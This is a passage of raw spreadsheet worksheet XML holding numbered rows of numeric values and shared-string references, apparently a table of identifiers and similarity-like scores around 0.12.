      <c r="B6152" s="2">
        <v>1.3492325E7</v>
      </c>
      <c r="C6152" s="2" t="s">
        <v>5862</v>
      </c>
      <c r="D6152" s="2">
        <v>1.0</v>
      </c>
      <c r="E6152" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6152" s="2">
        <v>0.1242424242424242</v>
      </c>
    </row>
    <row r="6153" ht="15.75" customHeight="1">
      <c r="A6153" s="1">
        <v>29869.0</v>
      </c>
      <c r="B6153" s="2">
        <v>3.5919063E7</v>
      </c>
      <c r="C6153" s="2" t="s">
        <v>5863</v>
      </c>
      <c r="D6153" s="2">
        <v>1.0</v>
      </c>
      <c r="E6153" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6153" s="2">
        <v>0.1242424242424242</v>
      </c>
    </row>
    <row r="6154" ht="15.75" customHeight="1">
      <c r="A6154" s="1">
        <v>34030.0</v>
      </c>
      <c r="B6154" s="2">
        <v>9545897.0</v>
      </c>
      <c r="C6154" s="2" t="s">
        <v>5864</v>
      </c>
      <c r="D6154" s="2">
        <v>1.0</v>
      </c>
      <c r="E6154" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6154" s="2">
        <v>0.1242424242424242</v>
      </c>
    </row>
    <row r="6155" ht="15.75" customHeight="1">
      <c r="A6155" s="1">
        <v>22719.0</v>
      </c>
      <c r="B6155" s="2">
        <v>4.3433713E7</v>
      </c>
      <c r="C6155" s="2" t="s">
        <v>5865</v>
      </c>
      <c r="D6155" s="2">
        <v>1.0</v>
      </c>
      <c r="E6155" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6155" s="2">
        <v>0.1241319444444445</v>
      </c>
    </row>
    <row r="6156" ht="15.75" customHeight="1">
      <c r="A6156" s="1">
        <v>28168.0</v>
      </c>
      <c r="B6156" s="2">
        <v>2.4940757E7</v>
      </c>
      <c r="C6156" s="2" t="s">
        <v>5866</v>
      </c>
      <c r="D6156" s="2">
        <v>1.0</v>
      </c>
      <c r="E6156" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6156" s="2">
        <v>0.1241319444444445</v>
      </c>
    </row>
    <row r="6157" ht="15.75" customHeight="1">
      <c r="A6157" s="1">
        <v>17159.0</v>
      </c>
      <c r="B6157" s="2">
        <v>4.888955E7</v>
      </c>
      <c r="C6157" s="2" t="s">
        <v>5867</v>
      </c>
      <c r="D6157" s="2">
        <v>1.0</v>
      </c>
      <c r="E6157" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6157" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="6158" ht="15.75" customHeight="1">
      <c r="A6158" s="1">
        <v>20266.0</v>
      </c>
      <c r="B6158" s="2">
        <v>1.1078819E7</v>
      </c>
      <c r="C6158" s="2" t="s">
        <v>5868</v>
      </c>
      <c r="D6158" s="2">
        <v>1.0</v>
      </c>
      <c r="E6158" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6158" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="6159" ht="15.75" customHeight="1">
      <c r="A6159" s="1">
        <v>22158.0</v>
      </c>
      <c r="B6159" s="2">
        <v>3.133364E7</v>
      </c>
      <c r="C6159" s="2" t="s">
        <v>5869</v>
      </c>
      <c r="D6159" s="2">
        <v>1.0</v>
      </c>
      <c r="E6159" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6159" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="6160" ht="15.75" customHeight="1">
      <c r="A6160" s="1">
        <v>22870.0</v>
      </c>
      <c r="B6160" s="2">
        <v>4.7481605E7</v>
      </c>
      <c r="C6160" s="2" t="s">
        <v>5870</v>
      </c>
      <c r="D6160" s="2">
        <v>1.0</v>
      </c>
      <c r="E6160" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6160" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="6161" ht="15.75" customHeight="1">
      <c r="A6161" s="1">
        <v>23433.0</v>
      </c>
      <c r="B6161" s="2">
        <v>5652467.0</v>
      </c>
      <c r="C6161" s="2" t="s">
        <v>5871</v>
      </c>
      <c r="D6161" s="2">
        <v>1.0</v>
      </c>
      <c r="E6161" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6161" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="6162" ht="15.75" customHeight="1">
      <c r="A6162" s="1">
        <v>27673.0</v>
      </c>
      <c r="B6162" s="2">
        <v>2.2928154E7</v>
      </c>
      <c r="C6162" s="2" t="s">
        <v>5872</v>
      </c>
      <c r="D6162" s="2">
        <v>1.0</v>
      </c>
      <c r="E6162" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6162" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="6163" ht="15.75" customHeight="1">
      <c r="A6163" s="1">
        <v>28414.0</v>
      </c>
      <c r="B6163" s="2">
        <v>2.6359515E7</v>
      </c>
      <c r="C6163" s="2" t="s">
        <v>5873</v>
      </c>
      <c r="D6163" s="2">
        <v>1.0</v>
      </c>
      <c r="E6163" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6163" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="6164" ht="15.75" customHeight="1">
      <c r="A6164" s="1">
        <v>28887.0</v>
      </c>
      <c r="B6164" s="2">
        <v>2.9242847E7</v>
      </c>
      <c r="C6164" s="2" t="s">
        <v>5874</v>
      </c>
      <c r="D6164" s="2">
        <v>1.0</v>
      </c>
      <c r="E6164" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6164" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="6165" ht="15.75" customHeight="1">
      <c r="A6165" s="1">
        <v>30217.0</v>
      </c>
      <c r="B6165" s="2">
        <v>3.7395961E7</v>
      </c>
      <c r="C6165" s="2" t="s">
        <v>5875</v>
      </c>
      <c r="D6165" s="2">
        <v>1.0</v>
      </c>
      <c r="E6165" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6165" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="6166" ht="15.75" customHeight="1">
      <c r="A6166" s="1">
        <v>32119.0</v>
      </c>
      <c r="B6166" s="2">
        <v>5408285.0</v>
      </c>
      <c r="C6166" s="2" t="s">
        <v>5876</v>
      </c>
      <c r="D6166" s="2">
        <v>1.0</v>
      </c>
      <c r="E6166" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6166" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="6167" ht="15.75" customHeight="1">
      <c r="A6167" s="1">
        <v>32383.0</v>
      </c>
      <c r="B6167" s="2">
        <v>5.6133092E7</v>
      </c>
      <c r="C6167" s="2" t="s">
        <v>5877</v>
      </c>
      <c r="D6167" s="2">
        <v>1.0</v>
      </c>
      <c r="E6167" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6167" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="6168" ht="15.75" customHeight="1">
      <c r="A6168" s="1">
        <v>16683.0</v>
      </c>
      <c r="B6168" s="2">
        <v>4.7302289E7</v>
      </c>
      <c r="C6168" s="2" t="s">
        <v>5878</v>
      </c>
      <c r="D6168" s="2">
        <v>1.0</v>
      </c>
      <c r="E6168" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6168" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="6169" ht="15.75" customHeight="1">
      <c r="A6169" s="1">
        <v>18530.0</v>
      </c>
      <c r="B6169" s="2">
        <v>5.3076323E7</v>
      </c>
      <c r="C6169" s="2" t="s">
        <v>5879</v>
      </c>
      <c r="D6169" s="2">
        <v>1.0</v>
      </c>
      <c r="E6169" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6169" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="6170" ht="15.75" customHeight="1">
      <c r="A6170" s="1">
        <v>20499.0</v>
      </c>
      <c r="B6170" s="2">
        <v>1.2881801E7</v>
      </c>
      <c r="C6170" s="2" t="s">
        <v>5880</v>
      </c>
      <c r="D6170" s="2">
        <v>1.0</v>
      </c>
      <c r="E6170" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6170" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="6171" ht="15.75" customHeight="1">
      <c r="A6171" s="1">
        <v>21282.0</v>
      </c>
      <c r="B6171" s="2">
        <v>2.0366395E7</v>
      </c>
      <c r="C6171" s="2" t="s">
        <v>5881</v>
      </c>
      <c r="D6171" s="2">
        <v>1.0</v>
      </c>
      <c r="E6171" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6171" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="6172" ht="15.75" customHeight="1">
      <c r="A6172" s="1">
        <v>21985.0</v>
      </c>
      <c r="B6172" s="2">
        <v>2.9437542E7</v>
      </c>
      <c r="C6172" s="2" t="s">
        <v>5882</v>
      </c>
      <c r="D6172" s="2">
        <v>1.0</v>
      </c>
      <c r="E6172" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6172" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="6173" ht="15.75" customHeight="1">
      <c r="A6173" s="1">
        <v>22806.0</v>
      </c>
      <c r="B6173" s="2">
        <v>4.5813301E7</v>
      </c>
      <c r="C6173" s="2" t="s">
        <v>5817</v>
      </c>
      <c r="D6173" s="2">
        <v>1.0</v>
      </c>
      <c r="E6173" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6173" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="6174" ht="15.75" customHeight="1">
      <c r="A6174" s="1">
        <v>23908.0</v>
      </c>
      <c r="B6174" s="2">
        <v>8491302.0</v>
      </c>
      <c r="C6174" s="2" t="s">
        <v>5827</v>
      </c>
      <c r="D6174" s="2">
        <v>1.0</v>
      </c>
      <c r="E6174" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6174" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="6175" ht="15.75" customHeight="1">
      <c r="A6175" s="1">
        <v>24026.0</v>
      </c>
      <c r="B6175" s="2">
        <v>9402690.0</v>
      </c>
      <c r="C6175" s="2" t="s">
        <v>5883</v>
      </c>
      <c r="D6175" s="2">
        <v>1.0</v>
      </c>
      <c r="E6175" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6175" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="6176" ht="15.75" customHeight="1">
      <c r="A6176" s="1">
        <v>26159.0</v>
      </c>
      <c r="B6176" s="2">
        <v>1.6083655E7</v>
      </c>
      <c r="C6176" s="2" t="s">
        <v>5884</v>
      </c>
      <c r="D6176" s="2">
        <v>1.0</v>
      </c>
      <c r="E6176" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6176" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="6177" ht="15.75" customHeight="1">
      <c r="A6177" s="1">
        <v>27060.0</v>
      </c>
      <c r="B6177" s="2">
        <v>2.0366394E7</v>
      </c>
      <c r="C6177" s="2" t="s">
        <v>5881</v>
      </c>
      <c r="D6177" s="2">
        <v>1.0</v>
      </c>
      <c r="E6177" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6177" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="6178" ht="15.75" customHeight="1">
      <c r="A6178" s="1">
        <v>27659.0</v>
      </c>
      <c r="B6178" s="2">
        <v>2.2863112E7</v>
      </c>
      <c r="C6178" s="2" t="s">
        <v>5885</v>
      </c>
      <c r="D6178" s="2">
        <v>1.0</v>
      </c>
      <c r="E6178" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6178" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="6179" ht="15.75" customHeight="1">
      <c r="A6179" s="1">
        <v>27971.0</v>
      </c>
      <c r="B6179" s="2">
        <v>2.3995613E7</v>
      </c>
      <c r="C6179" s="2" t="s">
        <v>5886</v>
      </c>
      <c r="D6179" s="2">
        <v>1.0</v>
      </c>
      <c r="E6179" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6179" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="6180" ht="15.75" customHeight="1">
      <c r="A6180" s="1">
        <v>28900.0</v>
      </c>
      <c r="B6180" s="2">
        <v>2.936452E7</v>
      </c>
      <c r="C6180" s="2" t="s">
        <v>5887</v>
      </c>
      <c r="D6180" s="2">
        <v>1.0</v>
      </c>
      <c r="E6180" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6180" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="6181" ht="15.75" customHeight="1">
      <c r="A6181" s="1">
        <v>33238.0</v>
      </c>
      <c r="B6181" s="2">
        <v>7303601.0</v>
      </c>
      <c r="C6181" s="2" t="s">
        <v>5888</v>
      </c>
      <c r="D6181" s="2">
        <v>1.0</v>
      </c>
      <c r="E6181" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6181" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="6182" ht="15.75" customHeight="1">
      <c r="A6182" s="1">
        <v>29926.0</v>
      </c>
      <c r="B6182" s="2">
        <v>3607052.0</v>
      </c>
      <c r="C6182" s="2" t="s">
        <v>5889</v>
      </c>
      <c r="D6182" s="2">
        <v>1.0</v>
      </c>
      <c r="E6182" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6182" s="2">
        <v>0.1237373737373738</v>
      </c>
    </row>
    <row r="6183" ht="15.75" customHeight="1">
      <c r="A6183" s="1">
        <v>32803.0</v>
      </c>
      <c r="B6183" s="2">
        <v>6168229.0</v>
      </c>
      <c r="C6183" s="2" t="s">
        <v>5890</v>
      </c>
      <c r="D6183" s="2">
        <v>1.0</v>
      </c>
      <c r="E6183" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6183" s="2">
        <v>0.1237373737373738</v>
      </c>
    </row>
    <row r="6184" ht="15.75" customHeight="1">
      <c r="A6184" s="1">
        <v>33713.0</v>
      </c>
      <c r="B6184" s="2">
        <v>8508955.0</v>
      </c>
      <c r="C6184" s="2" t="s">
        <v>5891</v>
      </c>
      <c r="D6184" s="2">
        <v>1.0</v>
      </c>
      <c r="E6184" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6184" s="2">
        <v>0.1237373737373738</v>
      </c>
    </row>
    <row r="6185" ht="15.75" customHeight="1">
      <c r="A6185" s="1">
        <v>238.0</v>
      </c>
      <c r="B6185" s="2">
        <v>1.4867514E7</v>
      </c>
      <c r="C6185" s="2" t="s">
        <v>5892</v>
      </c>
      <c r="D6185" s="2">
        <v>1.0</v>
      </c>
      <c r="E6185" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6185" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="6186" ht="15.75" customHeight="1">
      <c r="A6186" s="1">
        <v>1260.0</v>
      </c>
      <c r="B6186" s="2">
        <v>2.5207648E7</v>
      </c>
      <c r="C6186" s="2" t="s">
        <v>5893</v>
      </c>
      <c r="D6186" s="2">
        <v>1.0</v>
      </c>
      <c r="E6186" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6186" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="6187" ht="15.75" customHeight="1">
      <c r="A6187" s="1">
        <v>10738.0</v>
      </c>
      <c r="B6187" s="2">
        <v>1.5372855E7</v>
      </c>
      <c r="C6187" s="2" t="s">
        <v>5894</v>
      </c>
      <c r="D6187" s="2">
        <v>1.0</v>
      </c>
      <c r="E6187" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6187" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="6188" ht="15.75" customHeight="1">
      <c r="A6188" s="1">
        <v>20026.0</v>
      </c>
      <c r="B6188" s="2">
        <v>6534119.0</v>
      </c>
      <c r="C6188" s="2" t="s">
        <v>5895</v>
      </c>
      <c r="D6188" s="2">
        <v>1.0</v>
      </c>
      <c r="E6188" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6188" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="6189" ht="15.75" customHeight="1">
      <c r="A6189" s="1">
        <v>20481.0</v>
      </c>
      <c r="B6189" s="2">
        <v>1.2829768E7</v>
      </c>
      <c r="C6189" s="2" t="s">
        <v>5896</v>
      </c>
      <c r="D6189" s="2">
        <v>1.0</v>
      </c>
      <c r="E6189" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6189" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="6190" ht="15.75" customHeight="1">
      <c r="A6190" s="1">
        <v>20694.0</v>
      </c>
      <c r="B6190" s="2">
        <v>1.4523188E7</v>
      </c>
      <c r="C6190" s="2" t="s">
        <v>5897</v>
      </c>
      <c r="D6190" s="2">
        <v>1.0</v>
      </c>
      <c r="E6190" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6190" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="6191" ht="15.75" customHeight="1">
      <c r="A6191" s="1">
        <v>20976.0</v>
      </c>
      <c r="B6191" s="2">
        <v>1.688814E7</v>
      </c>
      <c r="C6191" s="2" t="s">
        <v>5898</v>
      </c>
      <c r="D6191" s="2">
        <v>1.0</v>
      </c>
      <c r="E6191" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6191" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="6192" ht="15.75" customHeight="1">
      <c r="A6192" s="1">
        <v>21084.0</v>
      </c>
      <c r="B6192" s="2">
        <v>1.8043892E7</v>
      </c>
      <c r="C6192" s="2" t="s">
        <v>5899</v>
      </c>
      <c r="D6192" s="2">
        <v>1.0</v>
      </c>
      <c r="E6192" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6192" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="6193" ht="15.75" customHeight="1">
      <c r="A6193" s="1">
        <v>21162.0</v>
      </c>
      <c r="B6193" s="2">
        <v>1.8943396E7</v>
      </c>
      <c r="C6193" s="2" t="s">
        <v>5900</v>
      </c>
      <c r="D6193" s="2">
        <v>1.0</v>
      </c>
      <c r="E6193" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6193" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="6194" ht="15.75" customHeight="1">
      <c r="A6194" s="1">
        <v>21525.0</v>
      </c>
      <c r="B6194" s="2">
        <v>2.3365038E7</v>
      </c>
      <c r="C6194" s="2" t="s">
        <v>5901</v>
      </c>
      <c r="D6194" s="2">
        <v>1.0</v>
      </c>
      <c r="E6194" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6194" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="6195" ht="15.75" customHeight="1">
      <c r="A6195" s="1">
        <v>21775.0</v>
      </c>
      <c r="B6195" s="2">
        <v>2.6421761E7</v>
      </c>
      <c r="C6195" s="2" t="s">
        <v>5902</v>
      </c>
      <c r="D6195" s="2">
        <v>1.0</v>
      </c>
      <c r="E6195" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6195" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="6196" ht="15.75" customHeight="1">
      <c r="A6196" s="1">
        <v>21796.0</v>
      </c>
      <c r="B6196" s="2">
        <v>2.6633145E7</v>
      </c>
      <c r="C6196" s="2" t="s">
        <v>5903</v>
      </c>
      <c r="D6196" s="2">
        <v>1.0</v>
      </c>
      <c r="E6196" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6196" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="6197" ht="15.75" customHeight="1">
      <c r="A6197" s="1">
        <v>23838.0</v>
      </c>
      <c r="B6197" s="2">
        <v>8114710.0</v>
      </c>
      <c r="C6197" s="2" t="s">
        <v>5904</v>
      </c>
      <c r="D6197" s="2">
        <v>1.0</v>
      </c>
      <c r="E6197" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6197" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="6198" ht="15.75" customHeight="1">
      <c r="A6198" s="1">
        <v>24076.0</v>
      </c>
      <c r="B6198" s="2">
        <v>9694133.0</v>
      </c>
      <c r="C6198" s="2" t="s">
        <v>5905</v>
      </c>
      <c r="D6198" s="2">
        <v>1.0</v>
      </c>
      <c r="E6198" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6198" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="6199" ht="15.75" customHeight="1">
      <c r="A6199" s="1">
        <v>24254.0</v>
      </c>
      <c r="B6199" s="2">
        <v>1.0504958E7</v>
      </c>
      <c r="C6199" s="2" t="s">
        <v>5906</v>
      </c>
      <c r="D6199" s="2">
        <v>1.0</v>
      </c>
      <c r="E6199" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6199" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="6200" ht="15.75" customHeight="1">
      <c r="A6200" s="1">
        <v>24715.0</v>
      </c>
      <c r="B6200" s="2">
        <v>1.1698543E7</v>
      </c>
      <c r="C6200" s="2" t="s">
        <v>5907</v>
      </c>
      <c r="D6200" s="2">
        <v>1.0</v>
      </c>
      <c r="E6200" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6200" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="6201" ht="15.75" customHeight="1">
      <c r="A6201" s="1">
        <v>25035.0</v>
      </c>
      <c r="B6201" s="2">
        <v>1.2829767E7</v>
      </c>
      <c r="C6201" s="2" t="s">
        <v>5908</v>
      </c>
      <c r="D6201" s="2">
        <v>1.0</v>
      </c>
      <c r="E6201" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6201" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="6202" ht="15.75" customHeight="1">
      <c r="A6202" s="1">
        <v>25313.0</v>
      </c>
      <c r="B6202" s="2">
        <v>1.3432386E7</v>
      </c>
      <c r="C6202" s="2" t="s">
        <v>5909</v>
      </c>
      <c r="D6202" s="2">
        <v>1.0</v>
      </c>
      <c r="E6202" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6202" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="6203" ht="15.75" customHeight="1">
      <c r="A6203" s="1">
        <v>25656.0</v>
      </c>
      <c r="B6203" s="2">
        <v>1.4523187E7</v>
      </c>
      <c r="C6203" s="2" t="s">
        <v>5897</v>
      </c>
      <c r="D6203" s="2">
        <v>1.0</v>
      </c>
      <c r="E6203" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6203" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="6204" ht="15.75" customHeight="1">
      <c r="A6204" s="1">
        <v>26212.0</v>
      </c>
      <c r="B6204" s="2">
        <v>1.6252774E7</v>
      </c>
      <c r="C6204" s="2" t="s">
        <v>5910</v>
      </c>
      <c r="D6204" s="2">
        <v>1.0</v>
      </c>
      <c r="E6204" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6204" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="6205" ht="15.75" customHeight="1">
      <c r="A6205" s="1">
        <v>26214.0</v>
      </c>
      <c r="B6205" s="2">
        <v>1.6252774E7</v>
      </c>
      <c r="C6205" s="2" t="s">
        <v>5911</v>
      </c>
      <c r="D6205" s="2">
        <v>1.0</v>
      </c>
      <c r="E6205" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6205" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="6206" ht="15.75" customHeight="1">
      <c r="A6206" s="1">
        <v>26368.0</v>
      </c>
      <c r="B6206" s="2">
        <v>1.6888139E7</v>
      </c>
      <c r="C6206" s="2" t="s">
        <v>5898</v>
      </c>
      <c r="D6206" s="2">
        <v>1.0</v>
      </c>
      <c r="E6206" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6206" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="6207" ht="15.75" customHeight="1">
      <c r="A6207" s="1">
        <v>26483.0</v>
      </c>
      <c r="B6207" s="2">
        <v>1.7470437E7</v>
      </c>
      <c r="C6207" s="2" t="s">
        <v>5912</v>
      </c>
      <c r="D6207" s="2">
        <v>1.0</v>
      </c>
      <c r="E6207" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6207" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="6208" ht="15.75" customHeight="1">
      <c r="A6208" s="1">
        <v>26627.0</v>
      </c>
      <c r="B6208" s="2">
        <v>1.8043891E7</v>
      </c>
      <c r="C6208" s="2" t="s">
        <v>5899</v>
      </c>
      <c r="D6208" s="2">
        <v>1.0</v>
      </c>
      <c r="E6208" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6208" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="6209" ht="15.75" customHeight="1">
      <c r="A6209" s="1">
        <v>26779.0</v>
      </c>
      <c r="B6209" s="2">
        <v>1.8536828E7</v>
      </c>
      <c r="C6209" s="2" t="s">
        <v>5913</v>
      </c>
      <c r="D6209" s="2">
        <v>1.0</v>
      </c>
      <c r="E6209" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6209" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="6210" ht="15.75" customHeight="1">
      <c r="A6210" s="1">
        <v>27098.0</v>
      </c>
      <c r="B6210" s="2">
        <v>2.0544343E7</v>
      </c>
      <c r="C6210" s="2" t="s">
        <v>5914</v>
      </c>
      <c r="D6210" s="2">
        <v>1.0</v>
      </c>
      <c r="E6210" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6210" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="6211" ht="15.75" customHeight="1">
      <c r="A6211" s="1">
        <v>27320.0</v>
      </c>
      <c r="B6211" s="2">
        <v>2.1378203E7</v>
      </c>
      <c r="C6211" s="2" t="s">
        <v>5915</v>
      </c>
      <c r="D6211" s="2">
        <v>1.0</v>
      </c>
      <c r="E6211" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6211" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="6212" ht="15.75" customHeight="1">
      <c r="A6212" s="1">
        <v>27580.0</v>
      </c>
      <c r="B6212" s="2">
        <v>2.250173E7</v>
      </c>
      <c r="C6212" s="2" t="s">
        <v>5916</v>
      </c>
      <c r="D6212" s="2">
        <v>1.0</v>
      </c>
      <c r="E6212" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6212" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="6213" ht="15.75" customHeight="1">
      <c r="A6213" s="1">
        <v>27817.0</v>
      </c>
      <c r="B6213" s="2">
        <v>2.3365037E7</v>
      </c>
      <c r="C6213" s="2" t="s">
        <v>5917</v>
      </c>
      <c r="D6213" s="2">
        <v>1.0</v>
      </c>
      <c r="E6213" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6213" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="6214" ht="15.75" customHeight="1">
      <c r="A6214" s="1">
        <v>29072.0</v>
      </c>
      <c r="B6214" s="2">
        <v>3.0320592E7</v>
      </c>
      <c r="C6214" s="2" t="s">
        <v>5918</v>
      </c>
      <c r="D6214" s="2">
        <v>1.0</v>
      </c>
      <c r="E6214" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6214" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="6215" ht="15.75" customHeight="1">
      <c r="A6215" s="1">
        <v>31067.0</v>
      </c>
      <c r="B6215" s="2">
        <v>4.8165181E7</v>
      </c>
      <c r="C6215" s="2" t="s">
        <v>5919</v>
      </c>
      <c r="D6215" s="2">
        <v>1.0</v>
      </c>
      <c r="E6215" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6215" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="6216" ht="15.75" customHeight="1">
      <c r="A6216" s="1">
        <v>31153.0</v>
      </c>
      <c r="B6216" s="2">
        <v>4.8911104E7</v>
      </c>
      <c r="C6216" s="2" t="s">
        <v>5920</v>
      </c>
      <c r="D6216" s="2">
        <v>1.0</v>
      </c>
      <c r="E6216" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6216" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="6217" ht="15.75" customHeight="1">
      <c r="A6217" s="1">
        <v>32889.0</v>
      </c>
      <c r="B6217" s="2">
        <v>6368672.0</v>
      </c>
      <c r="C6217" s="2" t="s">
        <v>5921</v>
      </c>
      <c r="D6217" s="2">
        <v>1.0</v>
      </c>
      <c r="E6217" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6217" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="6218" ht="15.75" customHeight="1">
      <c r="A6218" s="1">
        <v>34068.0</v>
      </c>
      <c r="B6218" s="2">
        <v>9645204.0</v>
      </c>
      <c r="C6218" s="2" t="s">
        <v>5582</v>
      </c>
      <c r="D6218" s="2">
        <v>1.0</v>
      </c>
      <c r="E6218" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6218" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="6219" ht="15.75" customHeight="1">
      <c r="A6219" s="1">
        <v>10017.0</v>
      </c>
      <c r="B6219" s="2">
